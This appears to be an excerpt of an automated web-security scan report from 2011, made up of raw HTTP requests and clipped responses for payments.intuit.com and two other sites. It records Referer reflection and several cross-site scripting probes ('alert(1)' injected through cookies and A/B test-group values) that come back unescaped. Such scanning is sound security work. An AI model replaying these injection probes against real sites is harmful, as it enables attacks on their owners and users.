HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:14 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960AADB0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 150347 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:27 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960DDDB0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 150376 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:59 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F84AD0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 121601 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:46 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=l X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F54670A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 121568 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:40 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=bXui4YZA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F3B280A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 127127 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:26 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=FA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F06D70A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 127094 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:57 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D96069050A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116386 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:13 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960A9370A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116418 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /support/ |
GET /support/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:01:27 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95D33000A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 98228 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /support/ |
GET /support/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:01:12 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95CFABC0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 98195 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /support/glossary.jsp |
GET /support/glossary.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:54 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95CB3660A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140104 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /support/glossary.jsp |
GET /support/glossary.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:01:05 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95CDE020A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140135 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.highbeam.com |
Path: | /doc/1P2-675451.html |
GET /doc/1P2-675451.html HTTP/1.1 Host: www.highbeam.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: private, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Mon, 21 Mar 2011 16:42:23 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId Set-Cookie: FirstVisit=repeat; domain=highbeam.com; expires=Sat, 17-Sep-2011 16:43:23 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 21 Mar 2011 16:43:22 GMT Vary: Accept-Encoding, User-Agent Content-Length: 32058 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_HeadMain"> ...[SNIP]... <script language="javascript" type="text/javascript"> var tancc='sq=21569\\';alert(1)/ var tcdacmd='dt'; </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://k.collective-media |
Path: | /cmadj/cm.womensforum/ |
GET /cmadj/cm.womensforum/;sz Host: k.collective-media.net Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac71c65a"%3balert(1)/ |
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Date: Mon, 21 Mar 2011 16:42:18 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media Set-Cookie: qcms=1; domain=collective-media Set-Cookie: blue=1; domain=collective-media Set-Cookie: qcdp=1; domain=collective-media Content-Length: 8287 function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... </scr'+'ipt>');Colle ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | / |
GET /?launchHelpMeChoose=true HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:54:08 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95680780A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 108446 ...[SNIP]... <input id="testGroup" value="T16262dd"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | / |
GET /?launchHelpMeChoose=true HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:55:31 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D957C7D80A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 108431 ...[SNIP]... <br /> A/B Test Group: T1654b80<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/ |
GET /apply-now/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:33 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95E35820A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 128379 ...[SNIP]... <input id="testGroup" value="T16e3bfc"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/ |
GET /apply-now/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:17 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95FCE130A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 128365 ...[SNIP]... <br /> A/B Test Group: T16b8e7d<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/check-warranty |
GET /apply-now/check-warranty Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:59:01 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95AF8AF0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 161404 ...[SNIP]... <input id="testGroup" value="T16d50dd"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/check-warranty |
GET /apply-now/check-warranty Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:01:02 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95CD1C50A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 161391 ...[SNIP]... <br /> A/B Test Group: T165bab0<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/contact-me.jsp |
GET /apply-now/contact-me.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:58:48 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95AC6930A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 93343 ...[SNIP]... <input id="testGroup" value="T16985ed"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/contact-me.jsp |
GET /apply-now/contact-me.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:10 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C08810A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 93328 ...[SNIP]... <br /> A/B Test Group: T16dbc30<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/ |
GET /products/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:58:39 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95AA5C10A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 90419 ...[SNIP]... <br /> A/B Test Group: T1620d8b<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/ |
GET /products/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:57:27 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9598B0D0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 90433 ...[SNIP]... <input id="testGroup" value="T16880a1"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
